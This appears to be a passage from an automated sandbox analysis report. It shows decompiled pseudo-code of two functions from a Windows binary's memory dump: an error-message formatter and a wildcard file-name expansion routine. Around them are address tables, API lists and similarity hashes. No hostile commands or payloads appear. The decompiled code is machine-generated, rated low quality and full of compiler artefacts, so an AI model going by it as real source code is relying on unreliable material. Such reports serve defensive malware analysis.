                              • Part of subcall function 009F9954: ReleaseDC.USER32(00000000,?), ref: 009F9A20
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ObjectRelease$CapsDevice
                            • String ID: (
                            • API String ID: 1061551593-3887548279
                            • Opcode ID: 729a3886ad9ad7859358a83bddbbcd482b3bc0ee26a3aee1f22f947f0891219c
                            • Instruction ID: 211926fe97fc3580f606fdc16e0e6f6597d23a9379681edd4bb56965f5b7b47a
                            • Opcode Fuzzy Hash: 729a3886ad9ad7859358a83bddbbcd482b3bc0ee26a3aee1f22f947f0891219c
                            • Instruction Fuzzy Hash: 0D611371208305AFD214DFA8C884E6BBBE9FF89704F10491DF699CB260D771E945CB62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009F0A9F, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                            Download Yara Rule
                            C-Code - Quality: 17%
                            			E009F0A9F(intOrPtr* __ecx) {
				char _v516;
				signed int _t26;
				void* _t28;
				void* _t32;
				signed int _t33;
				signed int _t34;
				signed int _t35;
				signed int _t38;
				void* _t47;
				void* _t48;

				_t41 = __ecx;
				_t44 = __ecx;
				_t26 =  *(__ecx + 0x48);
				_t47 = _t26 - 0x6f;
				if(_t47 > 0) {
					__eflags = _t26 - 0x7d;
					if(_t26 == 0x7d) {
						E009FC339();
						_t28 = E009EDA42(_t41, 0x96);
						return E009F9735( *0xa275d8, E009EDA42(_t41, 0xc9), _t28, 0);
					}
				} else {
					if(_t47 == 0) {
						_push(0x456);
						L38:
						_push(E009EDA42(_t41));
						_push( *_t44);
						L19:
						_t32 = E009FA57D();
						L11:
						return _t32;
					}
					_t48 = _t26 - 0x16;
					if(_t48 > 0) {
						__eflags = _t26 - 0x38;
						if(__eflags > 0) {
							_t33 = _t26 - 0x39;
							__eflags = _t33;
							if(_t33 == 0) {
								_push(0x8c);
								goto L38;
							}
							_t34 = _t33 - 1;
							__eflags = _t34;
							if(_t34 == 0) {
								_push(0x6f);
								goto L38;
							}
							_t35 = _t34 - 1;
							__eflags = _t35;
							if(_t35 == 0) {
								_push( *((intOrPtr*)(__ecx + 4)));
								_push(0x406);
								goto L13;
							}
							_t38 = _t35 - 9;
							__eflags = _t38;
							if(_t38 == 0) {
								_push(0x343);
								goto L38;
							}
							_t26 = _t38 - 1;
							__eflags = _t26;
							if(_t26 == 0) {
								_push(0x86);
								goto L38;
							}
						} else {
							if(__eflags == 0) {
								_push(0x67);
								goto L38;
							}
							_t26 = _t26 - 0x17;
							__eflags = _t26 - 0xb;
							if(_t26 <= 0xb) {
								switch( *((intOrPtr*)(_t26 * 4 +  &M009F0D63))) {
									case 0:
										_push(0xde);
										goto L18;
									case 1:
										_push(0xe1);
										goto L18;
									case 2:
										_push(0xb4);
										goto L38;
									case 3:
										_push(0x69);
										goto L38;
									case 4:
										_push(0x6a);
										goto L38;
									case 5:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x68);
										goto L13;
									case 6:
										_push(0x46f);
										goto L38;
									case 7:
										_push(0x470);
										goto L38;
									case 8:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x471);
										goto L13;
									case 9:
										goto L61;
									case 0xa:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x71);
										goto L13;
									case 0xb:
										E009EDA42(__ecx, 0xc8) =  &_v516;
										__eax = E009E3E41( &_v516, 0x100,  &_v516,  *((intOrPtr*)(__esi + 4)));
										_push( *((intOrPtr*)(__esi + 8)));
										__eax =  &_v516;
										_push( &_v516);
										return E009FA57D( *__esi, L"%s: %s");
								}
							}
						}
					} else {
						if(_t48 == 0) {
							_push( *__ecx);
							_push(0xdd);
							L23:
							E009EDA42(_t41);
							L7:
							_push(0);
							L8:
							return E009FA57D();
						}
						if(_t26 <= 0x15) {
							switch( *((intOrPtr*)(_t26 * 4 +  &M009F0D0B))) {
								case 0:
									_push( *__esi);
									_push(L"%ls");
									_push(">");
									goto L8;
								case 1:
									_push( *__ecx);
									_push(L"%ls");
									goto L7;
								case 2:
									_push(0);
									__eax = E009F9D55();
									goto L11;
								case 3:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7b);
									goto L13;
								case 4:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7a);
									goto L13;
								case 5:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7c);
									goto L13;
								case 6:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xca);
									goto L13;
								case 7:
									_push(0x70);
									L18:
									_push(E009EDA42(_t41));
									_push(0);
									goto L19;
								case 8:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x72);
									goto L13;
								case 9:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x78);
									goto L13;
								case 0xa:
									_push( *__esi);
									_push(0x85);
									goto L23;
								case 0xb:
									_push( *__esi);
									_push(0x204);
									goto L23;
								case 0xc:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x84);
									goto L13;
								case 0xd:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x83);
									goto L13;
								case 0xe:
									goto L61;
								case 0xf:
									_push( *((intOrPtr*)(__esi + 8)));
									_push( *((intOrPtr*)(__esi + 4)));
									__eax = E009EDA42(__ecx, 0xd2);
									return __eax;
								case 0x10:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x79);
									goto L13;
								case 0x11:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xdc);
									L13:
									_push(E009EDA42(_t41));
									_push( *_t44);
									goto L8;
							}
						}
					}
				}
				L61:
				return _t26;
			}













                            0x009f0a9f
                            0x009f0aa9
                            0x009f0aab
                            0x009f0aae
                            0x009f0ab1
                            0x009f0cd8
                            0x009f0cdb
                            0x009f0cdd
                            0x009f0ce9
                            0x00000000
                            0x009f0d00
                            0x009f0ab7
                            0x009f0ab7
                            0x009f0cce
                            0x009f0bfb
                            0x009f0c00
                            0x009f0c01
                            0x009f0b3e
                            0x009f0b3e
                            0x009f0b07
                            0x00000000
                            0x009f0b07
                            0x009f0abd
                            0x009f0ac0
                            0x009f0bc0
                            0x009f0bc3
                            0x009f0c83
                            0x009f0c83
                            0x009f0c86
                            0x009f0cc4
                            0x00000000
                            0x009f0cc4
                            0x009f0c88
                            0x009f0c88
                            0x009f0c8b
                            0x009f0cbd
                            0x00000000
                            0x009f0cbd
                            0x009f0c8d
                            0x009f0c8d
                            0x009f0c90
                            0x009f0cb0
                            0x009f0cb3
                            0x00000000
                            0x009f0cb3
                            0x009f0c92
                            0x009f0c92
                            0x009f0c95
                            0x009f0ca6
                            0x00000000
                            0x009f0ca6
                            0x009f0c97
                            0x009f0c97
                            0x009f0c9a
                            0x009f0c9c
                            0x00000000
                            0x009f0c9c
                            0x009f0bc9
                            0x009f0bc9
                            0x009f0c7c
                            0x00000000
                            0x009f0c7c
                            0x009f0bcf
                            0x009f0bd2
                            0x009f0bd5
                            0x009f0bdb
                            0x00000000
                            0x009f0be2
                            0x00000000
                            0x00000000
                            0x009f0bec
                            0x00000000
                            0x00000000
                            0x009f0bf6
                            0x00000000
                            0x00000000
                            0x009f0c08
                            0x00000000
                            0x00000000
                            0x009f0c0c
                            0x00000000
                            0x00000000
                            0x009f0c10
                            0x009f0c13
                            0x00000000
                            0x00000000
                            0x009f0c1a
                            0x00000000
                            0x00000000
                            0x009f0c21
                            0x00000000
                            0x00000000
                            0x009f0c28
                            0x009f0c2b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f0c35
                            0x009f0c38
                            0x00000000
                            0x00000000
                            0x009f0c4d
                            0x009f0c59
                            0x009f0c5e
                            0x009f0c61
                            0x009f0c67
                            0x00000000
                            0x00000000
                            0x009f0bdb
                            0x009f0bd5
                            0x009f0ac6
                            0x009f0ac6
                            0x009f0bb7
                            0x009f0bb9
                            0x009f0b5b
                            0x009f0b5b
                            0x009f0ae3
                            0x009f0ae3
                            0x009f0ae5
                            0x00000000
                            0x009f0aea
                            0x009f0acf
                            0x009f0ad5
                            0x00000000
                            0x009f0af2
                            0x009f0af4
                            0x009f0af9
                            0x00000000
                            0x00000000
                            0x009f0adc
                            0x009f0ade
                            0x00000000
                            0x00000000
                            0x009f0b00
                            0x009f0b02
                            0x00000000
                            0x00000000
                            0x009f0b0d
                            0x009f0b10
                            0x00000000
                            0x00000000
                            0x009f0b1c
                            0x009f0b1f
                            0x00000000
                            0x00000000
                            0x009f0b23
                            0x009f0b26
                            0x00000000
                            0x00000000
                            0x009f0b2a
                            0x009f0b2d
                            0x00000000
                            0x00000000
                            0x009f0b34
                            0x009f0b36
                            0x009f0b3b
                            0x009f0b3c
                            0x00000000
                            0x00000000
                            0x009f0b46
                            0x009f0b49
                            0x00000000
                            0x00000000
                            0x009f0b4d
                            0x009f0b50
                            0x00000000
                            0x00000000
                            0x009f0b54
                            0x009f0b56
                            0x00000000
                            0x00000000
                            0x009f0b63
                            0x009f0b65
                            0x00000000
                            0x00000000
                            0x009f0b6c
                            0x009f0b6f
                            0x00000000
                            0x00000000
                            0x009f0b76
                            0x009f0b79
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f0b80
                            0x009f0b83
                            0x009f0b8b
                            0x00000000
                            0x00000000
                            0x009f0ba0
                            0x009f0ba3
                            0x00000000
                            0x00000000
                            0x009f0baa
                            0x009f0bad
                            0x009f0b12
                            0x009f0b17
                            0x009f0b18
                            0x00000000
                            0x00000000
                            0x009f0ad5
                            0x009f0acf
                            0x009f0ac0
                            0x009f0d09
                            0x009f0d09

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _swprintf
                            • String ID: %ls$%s: %s
                            • API String ID: 589789837-2259941744
                            • Opcode ID: 576aab9dd9548bcafe76d427f5b481d5751665894e6066bcbe19fd20aba0c8ba
                            • Instruction ID: 9d0cc6764b34c362c785f6032112e3c376f91982ef56451e8ea55b3e497305d5
                            • Opcode Fuzzy Hash: 576aab9dd9548bcafe76d427f5b481d5751665894e6066bcbe19fd20aba0c8ba
                            • Instruction Fuzzy Hash: 9E51043168C30DFAEE211BD08E46F367A5DABC4B06F20CD06F7DA644E7D5A65960B702
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A09E43, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                            Download Yara Rule
                            C-Code - Quality: 75%
                            			E00A09E43(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t136;
				void* _t138;
				signed int _t139;
				signed int _t142;
				signed int _t144;
				signed int _t146;
				signed int* _t147;
				signed int _t150;
				void* _t153;
				CHAR* _t154;
				char _t157;
				char _t159;
				intOrPtr* _t162;
				void* _t163;
				intOrPtr* _t164;
				signed int _t166;
				void* _t168;
				intOrPtr* _t169;
				signed int _t173;
				signed int _t177;
				signed int _t178;
				intOrPtr* _t183;
				void* _t192;
				intOrPtr _t193;
				signed int _t195;
				signed int _t196;
				signed int _t198;
				signed int _t199;
				signed int _t201;
				union _FINDEX_INFO_LEVELS _t202;
				signed int _t207;
				signed int _t209;
				signed int _t210;
				void* _t212;
				intOrPtr _t213;
				void* _t214;
				signed int _t218;
				void* _t220;
				signed int _t221;
				void* _t222;
				void* _t223;
				void* _t224;
				signed int _t225;
				void* _t226;
				void* _t227;

				_t80 = _a8;
				_t223 = _t222 - 0x20;
				if(_t80 != 0) {
					_t207 = _a4;
					_t159 = 0;
					 *_t80 = 0;
					_t198 = 0;
					_t150 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t207;
					if( *_t207 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t150 - _t198;
						_v8 = _t159;
						_t190 = (_t82 >> 2) + 1;
						__eflags = _t150 - _t198;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t209 =  !_t207 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t209;
						if(_t209 != 0) {
							_t196 = _t198;
							_t157 = _t159;
							do {
								_t183 =  *_t196;
								_t17 = _t183 + 1; // 0x1
								_v8 = _t17;
								do {
									_t142 =  *_t183;
									_t183 = _t183 + 1;
									__eflags = _t142;
								} while (_t142 != 0);
								_t157 = _t157 + 1 + _t183 - _v8;
								_t196 = _t196 + 4;
								_t144 = _v12 + 1;
								_v12 = _t144;
								__eflags = _t144 - _t209;
							} while (_t144 != _t209);
							_t190 = _v16;
							_v8 = _t157;
							_t150 = _v336.cAlternateFileName;
						}
						_t210 = E00A06F0C(_t190, _v8, 1);
						_t224 = _t223 + 0xc;
						__eflags = _t210;
						if(_t210 != 0) {
							_t87 = _t210 + _v16 * 4;
							_v20 = _t87;
							_t191 = _t87;
							_v16 = _t87;
							__eflags = _t198 - _t150;
							if(_t198 == _t150) {
								L23:
								_t199 = 0;
								__eflags = 0;
								 *_a8 = _t210;
								goto L24;
							} else {
								_t93 = _t210 - _t198;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t162 =  *_t198;
									_v12 = _t162 + 1;
									do {
										_t95 =  *_t162;
										_t162 = _t162 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t163 = _t162 - _v12;
									_t35 = _t163 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E00A0DD71(_t163, _t191, _v20 - _t191 + _v8,  *_t198);
									_t224 = _t224 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E00A07DBB();
										asm("int3");
										_t220 = _t224;
										_push(_t163);
										_t164 = _v64;
										_t47 = _t164 + 1; // 0x1
										_t192 = _t47;
										do {
											_t103 =  *_t164;
											_t164 = _t164 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t198);
										_t201 = _a8;
										_t166 = _t164 - _t192 + 1;
										_v12 = _t166;
										__eflags = _t166 - (_t103 | 0xffffffff) - _t201;
										if(_t166 <= (_t103 | 0xffffffff) - _t201) {
											_push(_t150);
											_t50 = _t201 + 1; // 0x1
											_t153 = _t50 + _t166;
											_t212 = E00A07B1B(_t166, _t153, 1);
											_t168 = _t210;
											__eflags = _t201;
											if(_t201 == 0) {
												L34:
												_push(_v12);
												_t153 = _t153 - _t201;
												_t108 = E00A0DD71(_t168, _t212 + _t201, _t153, _v0);
												_t225 = _t224 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t136 = E00A0A212(_a12, _t192, __eflags, _t212);
													E00A07A50(0);
													_t138 = _t136;
													goto L36;
												}
											} else {
												_push(_t201);
												_t139 = E00A0DD71(_t168, _t212, _t153, _a4);
												_t225 = _t224 + 0x10;
												__eflags = _t139;
												if(_t139 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E00A07DBB();
													asm("int3");
													_push(_t220);
													_t221 = _t225;
													_t226 = _t225 - 0x150;
													_t111 =  *0xa1d668; // 0xda86b1c8
													_v116 = _t111 ^ _t221;
													_t169 = _v100;
													_push(_t153);
													_t154 = _v104;
													_push(_t212);
													_t213 = _v96;
													_push(_t201);
													_v440 = _t213;
													while(1) {
														__eflags = _t169 - _t154;
														if(_t169 == _t154) {
															break;
														}
														_t113 =  *_t169;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t169 = E00A0DDC0(_t154, _t169);
																	continue;
																}
															}
														}
														break;
													}
													_t193 =  *_t169;
													__eflags = _t193 - 0x3a;
													if(_t193 != 0x3a) {
														L47:
														_t202 = 0;
														__eflags = _t193 - 0x2f;
														if(_t193 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t193 - 0x5c;
															if(_t193 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t193 - 0x3a;
																if(_t193 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t169 - _t154 + 0x00000001;
														E009FE920(_t202,  &_v336, _t202, 0x140);
														_t227 = _t226 + 0xc;
														_t214 = FindFirstFileExA(_t154, _t202,  &_v336, _t202, _t202, _t202);
														_t123 = _v340;
														__eflags = _t214 - 0xffffffff;
														if(_t214 != 0xffffffff) {
															_t173 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t173;
															_v348 = _t173 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t154);
																	_push(_t123);
																	L28();
																	_t227 = _t227 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t177 = _v291;
																	__eflags = _t177;
																	if(_t177 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t177 - 0x2e;
																		if(_t177 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 = FindNextFileA(_t214,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t194 =  *_t123;
															_t178 = _v348;
															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t178 - _t131;
															if(_t178 != _t131) {
																E00A05030(_t154, _t202, _t214, _t194 + _t178 * 4, _t131 - _t178, 4, E00A09E2B);
															}
														} else {
															_push(_t123);
															_push(_t202);
															_push(_t202);
															_push(_t154);
															L28();
															L54:
															_t202 = _t123;
														}
														__eflags = _t214 - 0xffffffff;
														if(_t214 != 0xffffffff) {
															FindClose(_t214);
														}
														_t124 = _t202;
													} else {
														_t124 =  &(_t154[1]);
														__eflags = _t169 -  &(_t154[1]);
														if(_t169 ==  &(_t154[1])) {
															goto L47;
														} else {
															_push(_t213);
															_push(0);
															_push(0);
															_push(_t154);
															L28();
														}
													}
													L58:
													__eflags = _v16 ^ _t221;
													return E009FE203(_t124, _v16 ^ _t221);
												} else {
													goto L34;
												}
											}
										} else {
											_t138 = 0xc;
											L36:
											return _t138;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t195 = _v16;
									 *((intOrPtr*)(_v24 + _t198)) = _t195;
									_t198 = _t198 + 4;
									_t191 = _t195 + _v12;
									_v16 = _t195 + _v12;
									__eflags = _t198 - _t150;
								} while (_t198 != _t150);
								goto L23;
							}
						} else {
							_t199 = _t198 | 0xffffffff;
							L24:
							E00A07A50(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t159;
							_t146 = E00A0DD80( *_t207,  &_v8);
							__eflags = _t146;
							if(_t146 != 0) {
								_push( &_v36);
								_push(_t146);
								_push( *_t207);
								L38();
								_t223 = _t223 + 0xc;
							} else {
								_t146 =  &_v36;
								_push(_t146);
								_push(0);
								_push(0);
								_push( *_t207);
								L28();
								_t223 = _t223 + 0x10;
							}
							_t199 = _t146;
							__eflags = _t199;
							if(_t199 != 0) {
								break;
							}
							_t207 = _t207 + 4;
							_t159 = 0;
							__eflags =  *_t207;
							if( *_t207 != 0) {
								continue;
							} else {
								_t150 = _v336.cAlternateFileName;
								_t198 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E00A0A1ED( &_v36);
						_t91 = _t199;
						goto L26;
					}
				} else {
					_t147 = E00A07ECC();
					_t218 = 0x16;
					 *_t147 = _t218;
					E00A07DAB();
					_t91 = _t218;
					L26:
					return _t91;
				}
				L68:
			}





















































































                            0x00a09e48
                            0x00a09e4b
                            0x00a09e51
                            0x00a09e69
                            0x00a09e6c
                            0x00a09e70
                            0x00a09e72
                            0x00a09e74
                            0x00a09e76
                            0x00a09e79
                            0x00a09e7c
                            0x00a09e7f
                            0x00a09e81
                            0x00a09ed9
                            0x00a09ed9
                            0x00a09edf
                            0x00a09ee1
                            0x00a09eec
                            0x00a09ef0
                            0x00a09ef2
                            0x00a09ef5
                            0x00a09ef9
                            0x00a09ef9
                            0x00a09efb
                            0x00a09efd
                            0x00a09eff
                            0x00a09f01
                            0x00a09f01
                            0x00a09f03
                            0x00a09f06
                            0x00a09f09
                            0x00a09f09
                            0x00a09f0b
                            0x00a09f0c
                            0x00a09f0c
                            0x00a09f17
                            0x00a09f19
                            0x00a09f1c
                            0x00a09f1d
                            0x00a09f20
                            0x00a09f20
                            0x00a09f24
                            0x00a09f27
                            0x00a09f2a
                            0x00a09f2a
                            0x00a09f38
                            0x00a09f3a
                            0x00a09f3d
                            0x00a09f3f
                            0x00a09f49
                            0x00a09f4c
                            0x00a09f4f
                            0x00a09f51
                            0x00a09f54
                            0x00a09f56
                            0x00a09fa6
                            0x00a09fa9
                            0x00a09fa9
                            0x00a09fab
                            0x00000000
                            0x00a09f58
                            0x00a09f5a
                            0x00a09f5a
                            0x00a09f5c
                            0x00a09f5f
                            0x00a09f5f
                            0x00a09f64
                            0x00a09f67
                            0x00a09f67
                            0x00a09f69
                            0x00a09f6a
                            0x00a09f6a
                            0x00a09f6e
                            0x00a09f71
                            0x00a09f71
                            0x00a09f74
                            0x00a09f77
                            0x00a09f84
                            0x00a09f89
                            0x00a09f8c
                            0x00a09f8e
                            0x00a09fc8
                            0x00a09fc9
                            0x00a09fca
                            0x00a09fcb
                            0x00a09fcc
                            0x00a09fcd
                            0x00a09fd2
                            0x00a09fd6
                            0x00a09fd8
                            0x00a09fd9
                            0x00a09fdc
                            0x00a09fdc
                            0x00a09fdf
                            0x00a09fdf
                            0x00a09fe1
                            0x00a09fe2
                            0x00a09fe2
                            0x00a09feb
                            0x00a09fec
                            0x00a09fef
                            0x00a09ff2
                            0x00a09ff5
                            0x00a09ff7
                            0x00a09ffe
                            0x00a0a000
                            0x00a0a003
                            0x00a0a00d
                            0x00a0a010
                            0x00a0a011
                            0x00a0a013
                            0x00a0a027
                            0x00a0a027
                            0x00a0a02a
                            0x00a0a034
                            0x00a0a039
                            0x00a0a03c
                            0x00a0a03e
                            0x00000000
                            0x00a0a040
                            0x00a0a044
                            0x00a0a04d
                            0x00a0a053
                            0x00000000
                            0x00a0a056
                            0x00a0a015
                            0x00a0a015
                            0x00a0a01b
                            0x00a0a020
                            0x00a0a023
                            0x00a0a025
                            0x00a0a05c
                            0x00a0a05e
                            0x00a0a05f
                            0x00a0a060
                            0x00a0a061
                            0x00a0a062
                            0x00a0a063
                            0x00a0a068
                            0x00a0a06b
                            0x00a0a06c
                            0x00a0a06e
                            0x00a0a074
                            0x00a0a07b
                            0x00a0a07e
                            0x00a0a081
                            0x00a0a082
                            0x00a0a085
                            0x00a0a086
                            0x00a0a089
                            0x00a0a08a
                            0x00a0a0ab
                            0x00a0a0ab
                            0x00a0a0ad
                            0x00000000
                            0x00000000
                            0x00a0a092
                            0x00a0a094
                            0x00a0a096
                            0x00a0a098
                            0x00a0a09a
                            0x00a0a09c
                            0x00a0a09e
                            0x00a0a0a9
                            0x00000000
                            0x00a0a0a9
                            0x00a0a09e
                            0x00a0a09a
                            0x00000000
                            0x00a0a096
                            0x00a0a0af
                            0x00a0a0b1
                            0x00a0a0b4
                            0x00a0a0cd
                            0x00a0a0cd
                            0x00a0a0cf
                            0x00a0a0d2
                            0x00a0a0e2
                            0x00a0a0e4
                            0x00a0a0e4
                            0x00a0a0d4
                            0x00a0a0d4
                            0x00a0a0d7
                            0x00000000
                            0x00a0a0d9
                            0x00a0a0d9
                            0x00a0a0dc
                            0x00000000
                            0x00a0a0de
                            0x00a0a0de
                            0x00a0a0de
                            0x00a0a0dc
                            0x00a0a0d7
                            0x00a0a0f2
                            0x00a0a0f6
                            0x00a0a104
                            0x00a0a109
                            0x00a0a11e
                            0x00a0a120
                            0x00a0a126
                            0x00a0a129
                            0x00a0a15b
                            0x00a0a15b
                            0x00a0a160
                            0x00a0a166
                            0x00a0a166
                            0x00a0a16d
                            0x00a0a187
                            0x00a0a187
                            0x00a0a188
                            0x00a0a18e
                            0x00a0a194
                            0x00a0a195
                            0x00a0a196
                            0x00a0a19b
                            0x00a0a19e
                            0x00a0a1a0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a0a16f
                            0x00a0a16f
                            0x00a0a175
                            0x00a0a177
                            0x00000000
                            0x00a0a179
                            0x00a0a179
                            0x00a0a17c
                            0x00000000
                            0x00a0a17e
                            0x00a0a17e
                            0x00a0a185
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a0a185
                            0x00a0a17c
                            0x00a0a177
                            0x00000000
                            0x00a0a1a2
                            0x00a0a1aa
                            0x00a0a1b0
                            0x00a0a1b2
                            0x00a0a1b2
                            0x00a0a1ba
                            0x00a0a1bf
                            0x00a0a1c7
                            0x00a0a1ca
                            0x00a0a1cc
                            0x00a0a1e0
                            0x00a0a1e5
                            0x00a0a12b
                            0x00a0a12b
                            0x00a0a12c
                            0x00a0a12d
                            0x00a0a12e
                            0x00a0a12f
                            0x00a0a137
                            0x00a0a137
                            0x00a0a137
                            0x00a0a139
                            0x00a0a13c
                            0x00a0a13f
                            0x00a0a13f
                            0x00a0a145
                            0x00a0a0b6
                            0x00a0a0b6
                            0x00a0a0b9
                            0x00a0a0bb
                            0x00000000
                            0x00a0a0bd
                            0x00a0a0bd
                            0x00a0a0c0
                            0x00a0a0c1
                            0x00a0a0c2
                            0x00a0a0c3
                            0x00a0a0c8
                            0x00a0a0bb
                            0x00a0a147
                            0x00a0a14c
                            0x00a0a157
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a0a025
                            0x00a09ff9
                            0x00a09ffb
                            0x00a0a057
                            0x00a0a05b
                            0x00a0a05b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a09f90
                            0x00a09f93
                            0x00a09f96
                            0x00a09f99
                            0x00a09f9c
                            0x00a09f9f
                            0x00a09fa2
                            0x00a09fa2
                            0x00000000
                            0x00a09f5f
                            0x00a09f41
                            0x00a09f41
                            0x00a09fad
                            0x00a09faf
                            0x00000000
                            0x00a09fb4
                            0x00a09e83
                            0x00a09e83
                            0x00a09e86
                            0x00a09e8f
                            0x00a09e92
                            0x00a09e99
                            0x00a09e9b
                            0x00a09eb4
                            0x00a09eb5
                            0x00a09eb6
                            0x00a09eb8
                            0x00a09ebd
                            0x00a09e9d
                            0x00a09e9d
                            0x00a09ea0
                            0x00a09ea1
                            0x00a09ea3
                            0x00a09ea5
                            0x00a09ea7
                            0x00a09eac
                            0x00a09eac
                            0x00a09ec0
                            0x00a09ec2
                            0x00a09ec4
                            0x00000000
                            0x00000000
                            0x00a09eca
                            0x00a09ecd
                            0x00a09ecf
                            0x00a09ed1
                            0x00000000
                            0x00a09ed3
                            0x00a09ed3
                            0x00a09ed6
                            0x00000000
                            0x00a09ed6
                            0x00000000
                            0x00a09ed1
                            0x00a09fb5
                            0x00a09fb8
                            0x00a09fbd
                            0x00000000
                            0x00a09fc0
                            0x00a09e53
                            0x00a09e53
                            0x00a09e5a
                            0x00a09e5b
                            0x00a09e5d
                            0x00a09e62
                            0x00a09fc1
                            0x00a09fc5
                            0x00a09fc5
                            0x00000000

                            APIs
                            • _free.LIBCMT ref: 00A09FAF
                              • Part of subcall function 00A07DBB: IsProcessorFeaturePresent.KERNEL32(00000017,00A07DAA,00000016,00A07AE8,0000002C,00A1A968,00A0AF68,?,?,?,00A07DB7,00000000,00000000,00000000,00000000,00000000), ref: 00A07DBD
